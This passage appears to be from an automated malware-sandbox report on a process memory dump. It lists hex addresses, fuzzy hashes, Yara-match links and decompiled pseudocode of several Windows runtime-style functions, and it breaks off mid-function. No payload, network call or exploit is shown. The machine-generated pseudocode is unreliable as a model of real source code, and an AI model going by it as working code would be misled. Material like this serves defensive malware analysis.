0x1e4611ef
0x00000000
0x00000000
0x1e4611f1
0x00000000
0x1e4611d6
0x1e4611d6
0x00000000
0x1e4611d6
0x1e4611d4
0x1e461104
0x1e461106
0x00000000
0x00000000
0x1e461108
0x1e46110c
0x1e46111d
0x1e46110e
0x1e46110e
0x1e461110
0x1e461113
0x1e461115
0x1e461115
0x1e461115
0x1e461118
0x1e461118
0x1e461126
0x1e46113a
0x1e46113d
0x1e46113f
0x00000000
0x1e461141
0x1e461141
0x00000000
0x1e461141
0x1e46113f
0x1e4610d6
0x1e4610d9
0x1e4610dd
0x1e4610e3
0x1e4610e6
0x1e4610e9
0x00000000
0x00000000
0x1e4610ee
0x1e4610f0
0x1e4610f2
0x00000000
0x00000000
0x00000000
0x1e4610f2
0x00000000
0x1e461099
0x1e461099
0x1e46109c
0x1e46109c
0x1e46109e
0x1e4610a0
0x1e4610b3
0x1e4610a2
0x1e4610a2
0x1e4610a4
0x1e4610a7
0x1e4610a9
0x1e4610ab
0x1e4610ab
0x1e4610ab
0x1e4610ae
0x1e4610ae
0x1e4610b6
0x1e4610b9
0x00000000
0x00000000
0x1e4610be
0x1e4610c1
0x1e4610c3
0x00000000
0x00000000
0x00000000
0x1e4610c3
0x1e4610c5
0x00000000
0x1e4610c5
0x1e461097
0x1e461050
0x1e461053
0x1e461056
0x1e461059
0x1e46105c
0x1e46105e
0x1e461060
0x1e461062
0x1e461064
0x1e461064
0x1e461062
0x1e461066
0x1e461069
0x1e46106b
0x1e46106d
0x1e46106f
0x1e461076
0x1e461076
0x1e461076
0x00000000
0x1e461076
0x1e461071
0x1e461074
0x00000000
0x00000000
0x00000000
0x1e461074
0x1e461079
0x1e461079
0x1e46107b
0x1e46107b
0x1e46107f
0x1e461082
0x1e461085
0x00000000
0x1e461085
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d46e3f13d84df42ceb08b36fabe2cc6a014385cb28faf3b70c402f637ba721c2
Instruction ID: ea071a5036fc68939154c9578114b325cb73a282f3fa86f96ecccd2a53f15d61
Opcode Fuzzy Hash: d46e3f13d84df42ceb08b36fabe2cc6a014385cb28faf3b70c402f637ba721c2
Instruction Fuzzy Hash: A8716A74A00662CBCF18CF66D49067AB3F2FB4C301B614A6FD98A97740D779E951CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00567B79, Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: c0b6cefcc2d63d20b05559726cb80f4b784d7941143f26fb6d514971fe8e91b4
Instruction ID: 54845592c571659a4bafebb609249a6695ab20e9c614b44d8a174b6f4459dc8c
Opcode Fuzzy Hash: c0b6cefcc2d63d20b05559726cb80f4b784d7941143f26fb6d514971fe8e91b4
Instruction Fuzzy Hash: A8512D70508756CFDB21DB3884E17917FE5AF66324F95C699C8958F2E7C3328886C712

Uniqueness

Uniqueness Score: -1.00%

Function 1E3D2AE4, Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1E3D2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x1e498204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x1e498208; // 0x1e498207
				_t8 = _t57 + 0x1e498208; // 0x1e498207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x1e498450; // 0x75ac32
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x1e49821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x1e496d5c; // 0x7ffd0654
							_t72 =  *0x1e496d5c; // 0x7ffd0654
							_t75 =  *0x1e496d5c; // 0x7ffd0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x1e496d5c; // 0x7ffd0654
							_t84 =  *0x1e496d5c; // 0x7ffd0654
							_t87 =  *0x1e496d5c; // 0x7ffd0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E1E3EF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x1e3d2ae4
0x1e3d2aec
0x1e3d2aef
0x1e3d2af4
0x1e3d2af7
0x1e3d2afd
0x1e3d2b92
0x1e3d2b92
0x1e3d2b97
0x1e3d2b9c
0x1e3d2b9c
0x1e3d2b03
0x1e3d2b06
0x1e3d2b09
0x1e3d2b09
0x1e3d2b0f
0x1e3d2b15
0x1e3d2b15
0x1e3d2b1b
0x1e3d2b1e
0x1e3d2b21
0x1e3d2b26
0x1e3d2b29
0x1e3d2b81
0x1e3d2b84
0x1e3d2c0e
0x1e3d2c15
0x1e3d2c24
0x1e3d2c24
0x1e3d2b8a
0x1e3d2b8a
0x1e3d2b8a
0x1e3d2b8a
0x1e3d2b90
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3d2b4a
0x1e3d2b4a
0x1e3d2b4d
0x1e3d2b53
0x00000000
0x00000000
0x1e3d2b55
0x1e3d2b58
0x1e3d2bb7
0x1e415d1b
0x1e415d37
0x1e415d47
0x1e415d53
0x1e3d2bbd
0x1e3d2bbd
0x1e3d2bbd
0x1e3d2bb7
0x1e3d2b5d
0x1e3d2c2f
0x1e415d5b
0x1e415d77
0x1e415d87
0x1e415d93
0x1e3d2c35
0x1e3d2c35
0x1e3d2c35
0x1e3d2c2f
0x1e3d2b65
0x1e3d2b9f
0x1e3d2ba2
0x1e3d2b67
0x1e3d2b67
0x1e3d2b69
0x1e3d2b6b
0x1e3d2b6e
0x1e3d2bc9
0x1e3d2bcc
0x1e3d2bcf
0x1e3d2bd4
0x1e3d2bd6
0x1e3d2bd6
0x1e3d2bdb
0x1e3d2c02
0x1e3d2c05
0x1e3d2c07
0x00000000
0x1e3d2c07
0x1e3d2be0
0x1e3d2c00
0x1e3d2c3f
0x1e3d2c3f
0x00000000
0x1e3d2c00
0x1e3d2be5
0x1e3d2be7
0x1e3d2bec
0x1e3d2bf4
0x1e3d2bf6
0x00000000
0x1e3d2bf6
0x1e3d2b70
0x1e3d2b76
0x1e3d2b2b
0x1e3d2b2b
0x1e3d2b2d
0x1e3d2b2f
0x1e3d2b32
0x1e3d2b35
0x1e3d2b3a
0x00000000
0x1e3d2b40
0x1e3d2b43
0x1e3d2b45
0x1e3d2b47
0x1e3d2b4a
0x1e3d2b4d
0x1e3d2b53
0x00000000
0x00000000
0x00000000
0x1e3d2b53
0x1e3d2b78
0x1e3d2b78
0x1e3d2b7b
0x1e3d2b7e
0x00000000
0x1e3d2b7e
0x1e3d2b76
0x1e3d2ba5
0x1e3d2ba5
0x1e3d2ba8
0x1e3d2bad
0x00000000
0x00000000
0x1e3d2baf
0x1e3d2baf
0x1e3d2bc2
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b61538c4d92614845f241331efd39f092ecd46db861e544d38935b067a1f7fc7
Instruction ID: c5ef14d35ae7bfc235ef92dcca1825edb85a031dc9dd99db57e5846ff9dd41f5
Opcode Fuzzy Hash: b61538c4d92614845f241331efd39f092ecd46db861e544d38935b067a1f7fc7
Instruction Fuzzy Hash: 1151F377B10225CFCB18CF1DC8909ADB7B6FB88B10745865AE852AB314D770EE55CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1E3CDBE9, Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E1E3CDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E1E3ACC50(E1E3A4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E1E3C7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E1E478ED6(_t102, _t98);
						}
						_t76 = _v44;
						E1E3C2280(_t58, _v44);
						E1E3CDD82(_v44, _t102, _t98);
						E1E3CB944(_t102, _v5);
						return E1E3BFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x1e498628; // 0x0
							_v28 = _t67;
							_t68 =  *0x1e49862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x1e498628; // 0x0
						_t105 = _v28;
						_t80 =  *0x1e49862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x1e46fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x1e3cdbe9
0x1e3cdbf2
0x1e3cdbf7
0x1e3cdbf9
0x1e3cdbfc
0x1e3cdc00
0x1e3cdc03
0x1e3cdc14
0x1e3cdd54
0x1e3cdd54
0x1e3cdd54
0x1e3cdc18
0x1e3cdc1d
0x1e3cdc1d
0x1e3cdc32
0x1e3cdc3b
0x1e3cdc3e
0x1e3cdc46
0x1e3cdd5b
0x1e3cdd62
0x1e3cdd64
0x1e3cdd67
0x1e3cdd69
0x1e3cdd6b
0x1e3cdd6e
0x1e3cdd70
0x1e3cdd73
0x1e3cdd73
0x00000000
0x1e3cdc4c
0x1e3cdc4e
0x1e413ae3
0x1e413ae8
0x1e413aea
0x1e3cdce7
0x1e3cdce9
0x1e3cdcec
0x1e3cdcee
0x1e3cdcf0
0x1e3cdcf3
0x1e3cdcf5
0x1e413af2
0x1e413af5
0x1e413af5
0x1e3cdd06
0x1e3cdd08
0x1e3cdd0b
0x1e3cdd12
0x1e413b08
0x1e3cdd18
0x1e3cdd18
0x1e3cdd18
0x1e3cdd20
0x1e3cdd23
0x1e413b16
0x1e413b16
0x1e3cdd29
0x1e3cdd2d
0x1e3cdd36
0x1e3cdd40
0x1e3cdd51
0x1e3cdd51
0x1e3cdc54
0x1e3cdc59
0x1e3cdc59
0x1e3cdc5e
0x1e3cdc5e
0x1e3cdc63
0x1e3cdc66
0x1e3cdc6b
0x1e3cdc78
0x1e3cdc7b
0x1e3cdc81
0x1e3cdc81
0x1e3cdc83
0x1e3cdc89
0x00000000
0x00000000
0x1e3cdd7b
0x1e3cdd7b
0x1e3cdc8f
0x1e3cdc8f
0x1e3cdc92
0x1e3cdc99
0x1e3cdc9f
0x1e3cdca5
0x1e3cdcaa
0x1e3cdcaa
0x1e3cdcb3
0x1e3cdcb8
0x1e3cdcbb
0x1e3cdcc1
0x1e3cdccf
0x1e3cdcd2
0x1e3cdcd5
0x1e3cdcd7
0x1e3cdcda
0x1e3cdcdc
0x1e3cdcdc
0x1e3cdce2
0x1e3cdce4
0x00000000
0x1e3cdce4

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba2301d0d03730302339363585d2b741ca79c5991dfceff55aea5e8f0102106e
Instruction ID: 2cf60be18ade5863271f5b8274103fad556cb246520ce960b3314746ac965366
Opcode Fuzzy Hash: ba2301d0d03730302339363585d2b741ca79c5991dfceff55aea5e8f0102106e
Instruction Fuzzy Hash: BC5199B5E00656CBCB04CF68C484A9EBBF6BF48310F21865AE955AB344EB31ED44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1E3BEF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E1E3BEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E1E3A9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77dfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E1E3A2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x1e3bef4b
0x1e3bef4d
0x1e3bef57
0x1e3bf0bd
0x1e3bf0c2
0x1e3bf0d2
0x1e3bf0d2
0x1e3bf0c2
0x1e3bef5d
0x1e3bef5f
0x1e3bef67
0x1e3bef6a
0x1e3bef6d
0x1e3bef74
0x1e3bef7f
0x1e3bef82
0x1e3bef82
0x1e3bef86
0x1e3bef88
0x1e3bef8c
0x1e3bef8f
0x1e3bef8f
0x1e3bef8f
0x00000000
0x1e3bef91
0x1e3bef93
0x1e3befc4
0x1e3befc4
0x1e3befc4
0x1e3befca
0x1e3befd0
0x1e3bf0a6
0x00000000
0x00000000
0x1e3bf0af
0x1e40bb06
0x1e40bb0a
0x1e3bf0b5
0x1e3bf0b5
0x1e3bf0b5
0x1e3bf0b5
0x00000000
0x1e3befd6
0x1e3befd9
0x1e3bf0de
0x1e3bf0e2
0x1e3befdf
0x1e3befdf
0x1e3befdf
0x1e3befe5
0x1e40bafc
0x1e40bafc
0x1e3befe5
0x1e3befeb
0x1e3befed
0x1e3bf00f
0x1e3bf011
0x1e3bf01a
0x1e3bf01d
0x1e3bf021
0x1e3bf028
0x1e3bf029
0x1e3bf029
0x1e3bf02c
0x00000000
0x1e3bf02c
0x1e3beff3
0x1e3beff9
0x1e3bf0ea
0x1e3bf0ed
0x1e3bf0ef
0x00000000
0x1e3bf0ef
0x1e3bf003
0x1e40bb12
0x1e3bf045
0x1e3bf049
0x1e3bf051
0x1e3bf09e
0x1e3bf0a0
0x1e3bf0a0
0x1e3bf09e
0x1e3bf053
0x1e3bf064
0x1e3bf064
0x1e3bf06b
0x1e40bb1a
0x1e40bb1a
0x1e3bf071
0x1e3bf071
0x1e3bf07d
0x1e3bf082
0x1e3bf08f
0x1e3bf08f
0x1e3bf009
0x1e3bf00d
0x00000000
0x1e3bf00d
0x1e3befd0
0x1e3bef97
0x1e3befa5
0x1e3befaa
0x00000000
0x1e3befac
0x1e3befac
0x1e3befac
0x00000000
0x1e3befb2
0x1e3bf036
0x1e3bf03a
0x1e3bf040
0x1e3bf090
0x00000000
0x1e3bf092
0x1e3bf042
0x00000000
0x1e3bf042
0x1e3befb7
0x1e3befb9
0x1e3befbc
0x1e3befb0
0x1e3befb0
0x00000000
0x1e3befbe
0x1e3befbe
0x1e3befc1
0x00000000
0x1e3befc1
0x1e3befbc
0x1e3befaa
0x1e3bef91

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: 84a29080c489385143666b0c5f14cbddbcb30eb651aa13e501603a0df97b98ae
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 0051EF30E1428ADFDB00CB6AC4D078EBBB2AF45314F1583A9E44697B91C376A9C9C761

Uniqueness

Uniqueness Score: -1.00%

Function 1E47740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E1E47740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E1E3FD4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E1E3EF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L1E3C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L1E3C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E1E3EF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L1E3C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
